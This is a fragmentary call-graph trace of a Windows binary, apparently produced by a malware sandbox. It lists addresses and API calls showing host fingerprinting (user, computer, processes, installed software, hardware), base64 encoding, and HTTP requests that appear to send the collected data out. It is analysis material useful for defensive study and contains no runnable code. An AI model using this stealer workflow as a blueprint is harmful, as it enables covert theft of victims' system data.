78796->78797 78799 40fa9c 4 API calls 78797->78799 78800 401061 _EH_prolog 78798->78800 78801 4052a6 78799->78801 78802 405984 78800->78802 78803 40f9e1 lstrcpy 78801->78803 78802->77716 78804 4052b3 78803->78804 78805 40fa28 3 API calls 78804->78805 78806 4052cf 78805->78806 78807 40f9e1 lstrcpy 78806->78807 78808 4052dc 78807->78808 78809 40fa9c 4 API calls 78808->78809 78810 4052f9 78809->78810 78811 40f9e1 lstrcpy 78810->78811 78812 405306 78811->78812 78813 40fa9c 4 API calls 78812->78813 78814 405323 78813->78814 78815 40f9e1 lstrcpy 78814->78815 78816 405330 78815->78816 78817 40fa9c 4 API calls 78816->78817 78818 40534e 78817->78818 78819 40fa28 3 API calls 78818->78819 78820 405361 78819->78820 78821 40f9e1 lstrcpy 78820->78821 78822 40536e 78821->78822 78823 405386 InternetConnectA 78822->78823 78823->78779 78824 4053ac HttpOpenRequestA 78823->78824 78825 4053e3 78824->78825 78826 4058cf InternetCloseHandle 78824->78826 78827 4053e7 InternetSetOptionA 78825->78827 78828 4053fd 78825->78828 78826->78779 78827->78828 78829 40fa9c 4 API calls 78828->78829 78830 40540e 78829->78830 78831 40f9e1 lstrcpy 78830->78831 78832 40541b 78831->78832 78833 40fa28 3 API calls 78832->78833 78834 405437 78833->78834 78835 40f9e1 lstrcpy 78834->78835 78836 405444 78835->78836 78837 40fa9c 4 API calls 78836->78837 78838 405461 78837->78838 78839 40f9e1 lstrcpy 78838->78839 78840 40546e 78839->78840 78841 40fa9c 4 API calls 78840->78841 78842 40548c 78841->78842 78843 40f9e1 lstrcpy 78842->78843 78844 405499 78843->78844 78845 40fa9c 4 API calls 78844->78845 78846 4054b7 78845->78846 78847 40f9e1 lstrcpy 78846->78847 78848 4054c4 78847->78848 78849 40fa9c 4 API calls 78848->78849 78850 4054e1 78849->78850 78851 40f9e1 lstrcpy 78850->78851 78852 4054ee 78851->78852 78853 40fa28 3 API calls 78852->78853 78854 40550a 78853->78854 78855 40f9e1 lstrcpy 78854->78855 78856 405517 78855->78856 78857 40fa9c 4 API calls 78856->78857 78858 405534 78857->78858 78859 40f9e1 lstrcpy 78858->78859 78860 405541 78859->78860 78861 40fa9c 4 API calls 78860->78861 78862 40555e 78861->78862 78863 40f9e1 lstrcpy 78862->78863 78864 40556b 78863->78864 78865 40fa28 3 API calls 78864->78865 78866 405587 78865->78866 78867 40f9e1 lstrcpy 78866->78867 78868 405594 78867->78868 78869 40fa9c 4 API calls 78868->78869 78870 4055b1 78869->78870 78871 40f9e1 lstrcpy 78870->78871 78872 4055be 78871->78872 78873 40fa9c 4 API calls 78872->78873 78874 4055dc 78873->78874 78875 40f9e1 lstrcpy 78874->78875 78876 4055e9 78875->78876 78877 40fa9c 4 API calls 78876->78877 78878 405606 78877->78878 78879 40f9e1 lstrcpy 78878->78879 78880 405613 78879->78880 78881 40fa9c 4 API calls 78880->78881 78882 405630 78881->78882 78883 40f9e1 lstrcpy 78882->78883 78884 40563d 78883->78884 78885 40fa9c 4 API calls 78884->78885 78886 40565b 78885->78886 78887 40f9e1 lstrcpy 78886->78887 78888 405668 78887->78888 78889 40fa9c 4 API calls 78888->78889 78890 405685 78889->78890 78891 40f9e1 lstrcpy 78890->78891 78892 405692 78891->78892 78893 40fa9c 4 API calls 78892->78893 78894 4056af 78893->78894 78895 40f9e1 lstrcpy 78894->78895 78896 4056bc 78895->78896 78897 40fa28 3 API calls 78896->78897 78898 4056d8 78897->78898 78899 40f9e1 lstrcpy 78898->78899 78900 4056e5 78899->78900 78901 40fa9c 4 API calls 78900->78901 78902 405702 78901->78902 78903 40f9e1 lstrcpy 78902->78903 78904 40570f 78903->78904 78905 40fa9c 4 API calls 78904->78905 78906 40572d 78905->78906 78907 40f9e1 lstrcpy 78906->78907 78908 40573a 78907->78908 78909 40fa9c 4 API calls 78908->78909 78910 405757 78909->78910 78911 40f9e1 lstrcpy 78910->78911 78912 405764 78911->78912 78913 40fa9c 4 API calls 78912->78913 78914 405781 78913->78914 78915 40f9e1 lstrcpy 78914->78915 78916 40578e 78915->78916 78917 40fa28 3 API calls 78916->78917 78918 4057aa 78917->78918 78919 40f9e1 lstrcpy 78918->78919 78920 4057b7 78919->78920 78921 4057cb lstrlenA 78920->78921 79629 40fb4d 78921->79629 78923 4057dc lstrlenA GetProcessHeap HeapAlloc 79630 40fb4d 78923->79630 78925 4057fe lstrlenA 79631 40fb4d 78925->79631 78927 40580e memcpy 79632 40fb4d 78927->79632 78929 405820 lstrlenA 78930 405830 78929->78930 78931 405839 lstrlenA memcpy 78930->78931 79633 40fb4d 78931->79633 78933 405855 lstrlenA 79634 40fb4d 78933->79634 78935 405865 HttpSendRequestA 78936 4058b1 InternetReadFile 78935->78936 78937 4058c8 InternetCloseHandle 78936->78937 78939 405877 78936->78939 78937->78826 78938 40fa9c 4 API calls 78938->78939 78939->78936 78939->78937 78939->78938 78940 40f9e1 lstrcpy 78939->78940 78940->78939 79640 40fb4d 78941->79640 78943 411740 strtok_s 78944 4117a9 78943->78944 78945 41174d 78943->78945 78944->77718 78946 411792 strtok_s 78945->78946 78947 40f997 2 API calls 78945->78947 78948 40f997 2 API calls 78945->78948 78946->78944 78946->78945 78947->78946 78948->78945 79641 40fb4d 78949->79641 78951 41151d strtok_s 78956 41152e 78951->78956 78958 41162e 78951->78958 78952 4115df StrCmpCA 78952->78956 78953 40f997 2 API calls 78954 411611 strtok_s 78953->78954 78954->78956 78954->78958 78955 4115ae StrCmpCA 78955->78956 78956->78952 78956->78953 78956->78954 78956->78955 78957 411589 StrCmpCA 78956->78957 78959 41155b StrCmpCA 78956->78959 78957->78956 78958->77726 78959->78956 79642 40fb4d 78960->79642 78962 411674 strtok_s 78963 411681 78962->78963 78964 4116fa 78962->78964 78965 40f997 2 API calls 78963->78965 78966 4116ab StrCmpCA 78963->78966 78967 4116e3 strtok_s 78963->78967 78968 40f997 2 API calls 78963->78968 78964->77734 78965->78967 78966->78963 78967->78963 78967->78964 78968->78963 78970 40f923 lstrcpy 78969->78970 78971 414625 78970->78971 78972 40fa9c 4 API calls 78971->78972 78973 41463a 78972->78973 78974 40f9e1 lstrcpy 78973->78974 78975 414647 78974->78975 78976 40fa9c 4 API calls 78975->78976 78977 414665 78976->78977 78978 40f9e1 lstrcpy 78977->78978 78979 414672 78978->78979 78980 40fa9c 4 API calls 78979->78980 78981 41468f 78980->78981 78982 40f9e1 lstrcpy 78981->78982 78983 41469c 78982->78983 78984 40fa9c 4 API calls 78983->78984 78985 4146b9 78984->78985 78986 40f9e1 lstrcpy 78985->78986 78987 4146c6 78986->78987 78988 40fa9c 4 API calls 78987->78988 78989 4146e3 78988->78989 78990 40f9e1 lstrcpy 78989->78990 78991 4146f0 78990->78991 79643 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 78991->79643 78993 414701 78994 40fa9c 4 API calls 78993->78994 78995 41470e 78994->78995 78996 40f9e1 lstrcpy 78995->78996 78997 41471b 78996->78997 78998 40fa9c 4 API calls 78997->78998 78999 414738 78998->78999 79000 40f9e1 lstrcpy 78999->79000 79001 414745 79000->79001 79002 40fa9c 4 API calls 79001->79002 79003 414762 79002->79003 79004 40f9e1 lstrcpy 79003->79004 79005 41476f 79004->79005 79644 410415 memset RegOpenKeyExA 79005->79644 79007 414780 79008 40fa9c 4 API calls 79007->79008 79009 41478d 79008->79009 79010 40f9e1 lstrcpy 79009->79010 79011 41479a 79010->79011 79012 40fa9c 4 API calls 79011->79012 79013 4147b7 79012->79013 79014 40f9e1 lstrcpy 79013->79014 79015 4147c4 79014->79015 79016 40fa9c 4 API calls 79015->79016 79017 4147e1 79016->79017 79018 40f9e1 lstrcpy 79017->79018 79019 4147ee 79018->79019 79020 4104a2 2 API calls 79019->79020 79021 414803 79020->79021 79022 40fa28 3 API calls 79021->79022 79023 414815 79022->79023 79024 40f9e1 lstrcpy 79023->79024 79025 414822 79024->79025 79026 40fa9c 4 API calls 79025->79026 79027 41484b 79026->79027 79028 40f9e1 lstrcpy 79027->79028 79029 414858 79028->79029 79030 40fa9c 4 API calls 79029->79030 79031 414875 79030->79031 79032 40f9e1 lstrcpy 79031->79032 79033 414882 79032->79033 79034 4104dd 13 API calls 79033->79034 79035 414897 79034->79035 79036 40fa28 3 API calls 79035->79036 79037 4148a9 79036->79037 79038 40f9e1 lstrcpy 79037->79038 79039 4148b6 79038->79039 79040 40fa9c 4 API calls 79039->79040 79041 4148df 79040->79041 79042 40f9e1 lstrcpy 79041->79042 79043 4148ec 79042->79043 79044 40fa9c 4 API calls 79043->79044 79045 414909 79044->79045 79046 40f9e1 lstrcpy 79045->79046 79047 414916 79046->79047 79048 414922 GetCurrentProcessId 79047->79048 79648 411001 OpenProcess 79048->79648 79051 40fa28 3 API calls 79052 414945 79051->79052 79053 40f9e1 lstrcpy 79052->79053 79054 414952 79053->79054 79055 40fa9c 4 API calls 79054->79055 79056 41497b 79055->79056 79057 40f9e1 lstrcpy 79056->79057 79058 414988 79057->79058 79059 40fa9c 4 API calls 79058->79059 79060 4149a5 79059->79060 79061 40f9e1 lstrcpy 79060->79061 79062 4149b2 79061->79062 79063 40fa9c 4 API calls 79062->79063 79064 4149cf 79063->79064 79065 40f9e1 lstrcpy 79064->79065 79066 4149dc 79065->79066 79067 40fa9c 4 API calls 79066->79067 79068 4149f9 79067->79068 79069 40f9e1 lstrcpy 79068->79069 79070 414a06 79069->79070 79653 41064b GetProcessHeap HeapAlloc 79070->79653 79073 40fa9c 4 API calls 79074 414a24 79073->79074 79075 40f9e1 lstrcpy 79074->79075 79076 414a31 79075->79076 79077 40fa9c 4 API calls 79076->79077 79078 414a4e 79077->79078 79079 40f9e1 lstrcpy 79078->79079 79080 414a5b 79079->79080 79081 40fa9c 4 API calls 79080->79081 79082 414a78 79081->79082 79083 40f9e1 lstrcpy 79082->79083 79084 414a85 79083->79084 79659 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 79084->79659 79087 40fa28 3 API calls 79088 414aac 79087->79088 79089 40f9e1 lstrcpy 79088->79089 79090 414ab9 79089->79090 79091 40fa9c 4 API calls 79090->79091 79092 414ae2 79091->79092 79093 40f9e1 lstrcpy 79092->79093 79094 414aef 79093->79094 79095 40fa9c 4 API calls 79094->79095 79096 414b0c 79095->79096 79097 40f9e1 lstrcpy 79096->79097 79098 414b19 79097->79098 79672 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 79098->79672 79101 40fa28 3 API calls 79102 414b40 79101->79102 79103 40f9e1 lstrcpy 79102->79103 79104 414b4d 79103->79104 79105 40fa9c 4 API calls 79104->79105 79106 414b76 79105->79106 79107 40f9e1 lstrcpy 79106->79107 79108 414b83 79107->79108 79109 40fa9c 4 API calls 79108->79109 79110 414ba0 79109->79110 79111 40f9e1 lstrcpy 79110->79111 79112 414bad 79111->79112 79685 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 79112->79685 79115 40fa9c 4 API calls 79116 414bcb 79115->79116 79117 40f9e1 lstrcpy 79116->79117 79118 414bd8 79117->79118 79119 40fa9c 4 API calls 79118->79119 79120 414bf5 79119->79120 79121 40f9e1 lstrcpy 79120->79121 79122 414c02 79121->79122 79123 40fa9c 4 API calls 79122->79123 79124 414c1f 79123->79124 79125 40f9e1 lstrcpy 79124->79125 79126 414c2c 79125->79126 79687 40fbcb GetProcessHeap HeapAlloc GetUserNameA 79126->79687 79128 414c3d 79129 40fa9c 4 API calls 79128->79129 79130 414c4a 79129->79130 79131 40f9e1 lstrcpy 79130->79131 79132 414c57 79131->79132 79133 40fa9c 4 API calls 79132->79133 79134 414c74 79133->79134 79135 40f9e1 lstrcpy 79134->79135 79136 414c81 79135->79136 79137 40fa9c 4 API calls 79136->79137 79138 414c9e 79137->79138 79139 40f9e1 lstrcpy 79138->79139 79140 414cab 79139->79140 79688 4103a0 7 API calls 79140->79688 79143 40fa28 3 API calls 79144 414cd2 79143->79144 79145 40f9e1 lstrcpy 79144->79145 79146 414cdf 79145->79146 79147 40fa9c 4 API calls 79146->79147 79148 414d08 79147->79148 79149 40f9e1 lstrcpy 79148->79149 79150 414d15 79149->79150 79151 40fa9c 4 API calls 79150->79151 79152 414d32 79151->79152 79153 40f9e1 lstrcpy 79152->79153 79154 414d3f 79153->79154 79691 40fce5 _EH_prolog 79154->79691 79157 40fa28 3 API calls 79158 414d69 79157->79158 79159 40f9e1 lstrcpy 79158->79159 79160 414d76 79159->79160 79161 40fa9c 4 API calls 79160->79161 79162 414da5 79161->79162 79163 40f9e1 lstrcpy 79162->79163 79164 414db2 79163->79164 79165 40fa9c 4 API calls 79164->79165 79166 414dd5 79165->79166 79167 40f9e1 lstrcpy 79166->79167 79168 414de2 79167->79168 79701 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 79168->79701 79170 414df6 79171 40fa9c 4 API calls 79170->79171 79172 414e06 79171->79172 79173 40f9e1 lstrcpy 79172->79173 79174 414e13 79173->79174 79175 40fa9c 4 API calls 79174->79175 79176 414e36 79175->79176 79177 40f9e1 lstrcpy 79176->79177 79178 414e43 79177->79178 79179 40fa9c 4 API calls 79178->79179 79180 414e63 79179->79180 79181 40f9e1 lstrcpy 79180->79181 79182 414e70 79181->79182 79702 40fc92 GetProcessHeap HeapAlloc GetTimeZoneInformation 79182->79702 79185 40fa9c 4 API calls 79186 414e8e 79185->79186 79187 40f9e1 lstrcpy 79186->79187 79188 414e9b 79187->79188 79189 40fa9c 4 API calls 79188->79189 79190 414ebb 79189->79190 79191 40f9e1 lstrcpy 79190->79191 79192 414ec8 79191->79192 79193 40fa9c 4 API calls 79192->79193 79194 414eeb 79193->79194 79195 40f9e1 lstrcpy 79194->79195 79196 414ef8 79195->79196 79197 40fa9c 4 API calls 79196->79197 79198 414f1b 79197->79198 79199 40f9e1 lstrcpy 79198->79199 79200 414f28 79199->79200 79705 40fe18 GetProcessHeap HeapAlloc RegOpenKeyExA 79200->79705 79203 40fa9c 4 API calls 79204 414f4c 79203->79204 79205 40f9e1 lstrcpy 79204->79205 79206 414f59 79205->79206 79207 40fa9c 4 API calls 79206->79207 79208 414f7c 79207->79208 79209 40f9e1 lstrcpy 79208->79209 79210 414f89 79209->79210 79211 40fa9c 4 API calls 79210->79211 79212 414fa9 79211->79212 79213 40f9e1 lstrcpy 79212->79213 79214 414fb6 79213->79214 79708 40feb4 79214->79708 79217 40fa9c 4 API calls 79218 414fd4 79217->79218 79219 40f9e1 lstrcpy 79218->79219 79220 414fe1 79219->79220 79221 40fa9c 4 API calls 79220->79221 79222 415001 79221->79222 79223 40f9e1 lstrcpy 79222->79223 79224 41500e 79223->79224 79225 40fa9c 4 API calls 79224->79225 79226 41502e 79225->79226 79227 40f9e1 lstrcpy 79226->79227 79228 41503b 79227->79228 79723 40fe81 GetSystemInfo wsprintfA 79228->79723 79230 41504c 79231 40fa9c 4 API calls 79230->79231 79232 415059 79231->79232 79233 40f9e1 lstrcpy 79232->79233 79234 415066 79233->79234 79235 40fa9c 4 API calls 79234->79235 79236 415086 79235->79236 79237 40f9e1 lstrcpy 79236->79237 79238 415093 79237->79238 79239 40fa9c 4 API calls 79238->79239 79240 4150b3 79239->79240 79241 40f9e1 lstrcpy 79240->79241 79242 4150c0 79241->79242 79724 40ff81 GetProcessHeap HeapAlloc 79242->79724 79244 4150d1 79245 40fa9c 4 API calls 79244->79245 79246 4150de 79245->79246 79247 40f9e1 lstrcpy 79246->79247 79248 4150eb 79247->79248 79249 40fa9c 4 API calls 79248->79249 79250 41510b 79249->79250 79251 40f9e1 lstrcpy 79250->79251 79252 415118 79251->79252 79253 40fa9c 4 API calls 79252->79253 79254 41513b 79253->79254 79255 40f9e1 lstrcpy 79254->79255 79256 415148 79255->79256 79729 40ffea _EH_prolog 79256->79729 79259 40fa28 3 API calls 79260 415178 79259->79260 79261 40f9e1 lstrcpy 79260->79261 79262 415185 79261->79262 79263 40fa9c 4 API calls 79262->79263 79264 4151b7 79263->79264 79265 40f9e1 lstrcpy 79264->79265 79266 4151c4 79265->79266 79267 40fa9c 4 API calls 79266->79267 79268 4151e7 79267->79268 79269 40f9e1 lstrcpy 79268->79269 79270 4151f4 79269->79270 79735 4102c3 _EH_prolog 79270->79735 79272 41520f 79273 40fa28 3 API calls 79272->79273 79274 415224 79273->79274 79275 40f9e1 lstrcpy 79274->79275 79276 415231 79275->79276 79277 40fa9c 4 API calls 79276->79277 79278 415263 79277->79278 79279 40f9e1 lstrcpy 79278->79279 79280 415270 79279->79280 79281 40fa9c 4 API calls 79280->79281 79282 415293 79281->79282 79283 40f9e1 lstrcpy 79282->79283 79284 4152a0 79283->79284 79743 410071 _EH_prolog 79284->79743 79286 4152bd 79287 40fa28 3 API calls 79286->79287 79288 4152d3 79287->79288 79289 40f9e1 lstrcpy 79288->79289 79290 4152e0 79289->79290 79291 410071 15 API calls 79290->79291 79292 41530c 79291->79292 79293 40fa28 3 API calls 79292->79293 79294 41531f 79293->79294 79295 40f9e1 lstrcpy 79294->79295 79296 41532c 79295->79296 79297 40fa9c 4 API calls 79296->79297 79298 415358 79297->79298 79299 40f9e1 lstrcpy 79298->79299 79300 415365 79299->79300 79301 415379 lstrlenA 79300->79301 79302 415389 79301->79302 79303 40f923 lstrcpy 79302->79303 79304 41539f 79303->79304 79305 4010b1 2 API calls 79304->79305 79306 4153b7 79305->79306 79759 414437 _EH_prolog 79306->79759 79308 4153c4 79309 401061 _EH_prolog 79308->79309 79310 4153ea 79309->79310 79310->77739 79312 40f95a lstrcpy 79311->79312 79313 4041dd 79312->79313 79314 403a54 6 API calls 79313->79314 79315 4041e9 GetProcessHeap RtlAllocateHeap 79314->79315 80029 40fb4d 79315->80029 79317 404223 InternetOpenA StrCmpCA 79318 404242 79317->79318 79319 404378 InternetCloseHandle 79318->79319 79320 40424d InternetConnectA 79318->79320 79323 4042e9 79319->79323 79321 40426d HttpOpenRequestA 79320->79321 79322 40436f InternetCloseHandle 79320->79322 79324 4042a2 79321->79324 79325 404368 InternetCloseHandle 79321->79325 79322->79319 79323->77744 79326 4042a6 InternetSetOptionA 79324->79326 79327 4042bc HttpSendRequestA HttpQueryInfoA 79324->79327 79325->79322 79326->79327 79327->79323 79328 40430c 79327->79328 79328->79323 79328->79325 79329 404326 InternetReadFile 79328->79329 79329->79325 79329->79328 80030 4060db 79330->80030 79332 40ef5b 79336 40ed50 StrCmpCA 79363 40ed28 79336->79363 79339 40edc4 StrCmpCA 79339->79363 79342 40f923 lstrcpy 79342->79363 79343 40eee0 StrCmpCA 79343->79363 79348 4010b1 _EH_prolog lstrcpy 79348->79363 79349 40fa28 3 API calls 79349->79363 79351 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 79351->79363 79353 40f9e1 lstrcpy 79353->79363 79363->79332 79363->79336 79363->79339 79363->79342 79363->79343 79363->79348 79363->79349 79363->79351 79363->79353 79366 40f95a lstrcpy 79363->79366 80033 40d3fa _EH_prolog 79363->80033 80087 40d6bb _EH_prolog 79363->80087 80199 40b8af _EH_prolog 79363->80199 79366->79363 79588 40f923 lstrcpy 79587->79588 79589 402128 79588->79589 79589->78572 79591 401081 79590->79591 79591->78565 79592->78572 79593->78572 79594->78572 79595->78572 79596->78557 79597->78524 79598->78556 79599->78541 79600->78524 79601->78523 79602->78524 79603->78509 79604->78524 79606 40f923 lstrcpy 79605->79606 79607 402142 79606->79607 79607->78499 79608->78510 79609->78556 79611 4104c0 79610->79611 79612 40f923 lstrcpy 79611->79612 79613 4104d0 79612->79613 79613->78597 79614->78601 79616 403a6d 79615->79616 79616->79616 79617 403a74 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 79616->79617 79626 40fb4d 79617->79626 79619 403ab6 lstrlenA 79627 40fb4d 79619->79627 79621 403ac6 InternetCrackUrlA 79622 403ae4 79621->79622 79622->78610 79623->78735 79625 40f995 79624->79625 79625->78659 79626->79619 79627->79621 79628->78744 79629->78923 79630->78925 79631->78927 79632->78929 79633->78933 79634->78935 79636 40626c LocalAlloc 79635->79636 79637 4058f9 79635->79637 79636->79637 79638 40627c CryptStringToBinaryA 79636->79638 79637->78788 79637->78798 79638->79637 79639 406293 LocalFree 79638->79639 79639->79637 79640->78943 79641->78951 79642->78962 79643->78993 79645 410461 RegQueryValueExA 79644->79645 79646 41047c CharToOemA 79644->79646 79645->79646 79646->79007 79649 411041 79648->79649 79650 411025 K32GetModuleFileNameExA CloseHandle 79648->79650 79651 40f923 lstrcpy 79649->79651 79650->79649 79652 411050 79651->79652 79652->79051 79778 40fbbd 79653->79778 79656 41067e RegOpenKeyExA 79657 41069e RegQueryValueExA 79656->79657 79658 410677 79656->79658 79657->79658 79658->79073 79660 4107e5 79659->79660 79661 4108ea 79660->79661 79662 4107ed CoSetProxyBlanket 79660->79662 79664 40f923 lstrcpy 79661->79664 79663 41081d 79662->79663 79663->79661 79666 410851 VariantInit 79663->79666 79665 4108fb 79664->79665 79665->79087 79667 410874 79666->79667 79784 4106c4 _EH_prolog CoCreateInstance 79667->79784 79669 410882 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 79670 40f923 lstrcpy 79669->79670 79671 4108de VariantClear 79670->79671 79671->79665 79673 41098e 79672->79673 79674 410996 CoSetProxyBlanket 79673->79674 79675 410a33 79673->79675 79677 4109c6 79674->79677 79676 40f923 lstrcpy 79675->79676 79678 410a44 79676->79678 79677->79675 79679 4109f2 VariantInit 79677->79679 79678->79101 79680 410a15 79679->79680 79790 410c8d LocalAlloc CharToOemW 79680->79790 79682 410a1d 79683 40f923 lstrcpy 79682->79683 79684 410a27 VariantClear 79683->79684 79684->79678 79686 40fc33 79685->79686 79686->79115 79687->79128 79689 40f923 lstrcpy 79688->79689 79690 41040d 79689->79690 79690->79143 79692 40f923 lstrcpy 79691->79692 79693 40fd0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 79692->79693 79694 40fdf8 79693->79694 79700 40fd48 79693->79700 79696 40fe00 LocalFree 79694->79696 79697 40fe09 79694->79697 79695 40fd4d GetLocaleInfoA 79695->79700 79696->79697 79697->79157 79698 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 79698->79700 79699 40f9e1 lstrcpy 79699->79700 79700->79694 79700->79695 79700->79698 79700->79699 79701->79170 79703 40fce0 79702->79703 79704 40fcc4 wsprintfA 79702->79704 79703->79185 79704->79703 79706 40fe73 79705->79706 79707 40fe5b RegQueryValueExA 79705->79707 79706->79203 79707->79706 79709 40ff06 GetLogicalProcessorInformationEx 79708->79709 79710 40ff11 79709->79710 79711 40fedc GetLastError 79709->79711 79793 410ade GetProcessHeap HeapFree 79710->79793 79712 40fee7 79711->79712 79715 40ff65 79711->79715 79721 40feeb 79712->79721 79714 40ff6f 79714->79217 79715->79714 79794 410ade GetProcessHeap HeapFree 79715->79794 79716 40ff38 79716->79714 79720 40ff3e wsprintfA 79716->79720 79720->79714 79721->79709 79722 40ff5e 79721->79722 79791 410ade GetProcessHeap HeapFree 79721->79791 79792 410afb GetProcessHeap HeapAlloc 79721->79792 79722->79714 79723->79230 79795 410aa7 79724->79795 79727 40ffc1 wsprintfA 79727->79244 79730 40f923 lstrcpy 79729->79730 79731 410010 79730->79731 79732 41004c EnumDisplayDevicesA 79731->79732 79733 410061 79731->79733 79734 40f997 2 API calls 79731->79734 79732->79731 79732->79733 79733->79259 79734->79731 79736 40f923 lstrcpy 79735->79736 79737 4102ed CreateToolhelp32Snapshot Process32First 79736->79737 79738 410386 CloseHandle 79737->79738 79742 41031e 79737->79742 79738->79272 79739 410372 Process32Next 79739->79738 79739->79742 79740 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 79740->79742 79741 40f9e1 lstrcpy 79741->79742 79742->79739 79742->79740 79742->79741 79744 40f923 lstrcpy 79743->79744 79745 410095 RegOpenKeyExA 79744->79745 79746 4100c8 79745->79746 79758 4100e7 79745->79758 79748 40f95a lstrcpy 79746->79748 79747 4100f0 RegEnumKeyExA 79749 410119 wsprintfA RegOpenKeyExA 79747->79749 79747->79758 79754 4100d4 79748->79754 79750 410283 79749->79750 79751 41015d RegQueryValueExA 79749->79751 79753 40f95a lstrcpy 79750->79753 79752 410187 lstrlenA 79751->79752 79751->79758 79752->79758 79753->79754 79754->79286 79755 4101f2 RegQueryValueExA 79755->79758 79756 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 79756->79758 79757 40f9e1 lstrcpy 79757->79758 79758->79747 79758->79750 79758->79755 79758->79756 79758->79757 79797 413460 _EH_prolog 79759->79797 79761 41445a 79762 40f9e1 lstrcpy 79761->79762 79763 41447c 79762->79763 79764 40f9e1 lstrcpy 79763->79764 79765 4144a0 79764->79765 79766 40f9e1 lstrcpy 79765->79766 79767 4144ac 79766->79767 79768 40f9e1 lstrcpy 79767->79768 79769 4144b8 79768->79769 79770 4144bf Sleep 79769->79770 79771 4144cf CreateThread WaitForSingleObject 79769->79771 79770->79769 79772 40f923 lstrcpy 79771->79772 79801 413326 _EH_prolog 79771->79801 79773 4144fd 79772->79773 79799 4134ac _EH_prolog 79773->79799 79775 414510 79776 401061 _EH_prolog 79775->79776 79777 41451c 79776->79777 79777->79308 79781 40fb50 GetProcessHeap HeapAlloc RegOpenKeyExA 79778->79781 79780 40fbc2 79780->79656 79780->79658 79782 40fb93 RegQueryValueExA 79781->79782 79783 40fbaa 79781->79783 79782->79783 79783->79780 79785 4106fa SysAllocString 79784->79785 79786 410758 79784->79786 79785->79786 79788 410709 79785->79788 79786->79669 79787 410751 SysFreeString 79787->79786 79788->79787 79789 410735 _wtoi64 SysFreeString 79788->79789 79789->79787 79790->79682 79791->79721 79792->79721 79793->79716 79794->79714 79796 40ffab GlobalMemoryStatusEx 79795->79796 79796->79727 79798 413479 79797->79798 79798->79761 79800 4134cc 79799->79800 79800->79775 79810 40fb4d 79801->79810 79803 413347 lstrlenA 79804 413353 79803->79804 79805 41335e 79803->79805 79806 40f95a lstrcpy 79805->79806 79808 40f9e1 lstrcpy 79805->79808 79809 413406 StrCmpCA 79805->79809 79811 4043ad _EH_prolog 79805->79811 79806->79805 79808->79805 79809->79804 79809->79805 79810->79803 79812 40f95a lstrcpy 79811->79812 79813 4043dd 79812->79813 79814 403a54 6 API calls 79813->79814 79815 4043e9 79814->79815 80016 410dac 79815->80016 79817 404415 79818 404420 lstrlenA 79817->79818 79819 404430 79818->79819 79820 410dac 4 API calls 79819->79820 79821 40443e 79820->79821 79822 40f923 lstrcpy 79821->79822 79823 40444e 79822->79823 79824 40f923 lstrcpy 79823->79824 79825 40445f 79824->79825 79826 40f923 lstrcpy 79825->79826 79827 404470 79826->79827 79828 40f923 lstrcpy 79827->79828 79829 404481 79828->79829 79830 40f923 lstrcpy 79829->79830 79831 404492 StrCmpCA 79830->79831 79833 4044ae 79831->79833 79832 4044d4 79834 410b5c 3 API calls 79832->79834 79833->79832 79835 4044c3 InternetOpenA 79833->79835 79836 4044df 79834->79836 79835->79832 79846 404cf2 79835->79846 79837 40fa28 3 API calls 79836->79837 79838 4044f5 79837->79838 79839 40f9e1 lstrcpy 79838->79839 79840 404502 79839->79840 79841 40fa9c 4 API calls 79840->79841 79842 40452e 79841->79842 79843 40fa28 3 API calls 79842->79843 79844 404544 79843->79844 79847 40f95a lstrcpy 79846->79847 79857 404c4e 79847->79857 79857->79805 80017 410dbd CryptBinaryToStringA 80016->80017 80018 410db9 80016->80018 80017->80018 80019 410dda GetProcessHeap RtlAllocateHeap 80017->80019 80018->79817 80019->80018 80020 410df7 CryptBinaryToStringA 80019->80020 80020->80018 80029->79317 80389 4060a4 80030->80389 80032 4060ea 80032->79363 80390 4060af 80389->80390 80393 405f70 80390->80393 80392 4060c0 80392->80032 80396 405e09 80393->80396 80397 405e22 80396->80397 80398 405e1a 80396->80398 80412 4059a0 80397->80412 80398->80392 80414 4059af 80412->80414 80413 4059b6 80413->80398 80418 405a53 80413->80418 80414->80413 80415 405a06 80414->80415 80439 410afb GetProcessHeap HeapAlloc 80415->80439 81534 6cc6b694 81535 6cc6b6a0 ___scrt_is_nonwritable_in_current_image 81534->81535 81564 6cc6af2a 81535->81564 81537 6cc6b6a7 81538 6cc6b796 81537->81538 81539 6cc6b6d1 81537->81539 81543 6cc6b6ac ___scrt_is_nonwritable_in_current_image 81537->81543 81581 6cc6b1f7 IsProcessorFeaturePresent 81538->81581 81568 6cc6b064 81539->81568 81542 6cc6b6e0 __RTC_Initialize 81542->81543 81571 6cc6bf89 InitializeSListHead 81542->81571 81544 6cc6b7b3 ___scrt_uninitialize_crt __RTC_Initialize 81546 6cc6b6ee ___scrt_initialize_default_local_stdio_options 81550 6cc6b6f3 _initterm_e 81546->81550 81547 6cc6b79d ___scrt_is_nonwritable_in_current_image 81547->81544 81548 6cc6b7d2 81547->81548 81549 6cc6b828 81547->81549 81585 6cc6b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 81548->81585 81551 6cc6b1f7 ___scrt_fastfail 6 API calls 81549->81551 81550->81543 81553 6cc6b708 81550->81553 81555 6cc6b82f 81551->81555 81572 6cc6b072 81553->81572 81560 6cc6b86e dllmain_crt_process_detach 81555->81560 81561 6cc6b83b 81555->81561 81556 6cc6b7d7 81586 6cc6bf95 __std_type_info_destroy_list 81556->81586 81557 6cc6b70d 81557->81543 81559 6cc6b711 _initterm 81557->81559 81559->81543 81563 6cc6b840 81560->81563 81562 6cc6b860 dllmain_crt_process_attach 81561->81562 81561->81563 81562->81563 81565 6cc6af33 81564->81565 81587 6cc6b341 IsProcessorFeaturePresent 81565->81587 81567 6cc6af3f ___scrt_uninitialize_crt 81567->81537 81588 6cc6af8b 81568->81588 81570 6cc6b06b 81570->81542 81571->81546 81573 6cc6b077 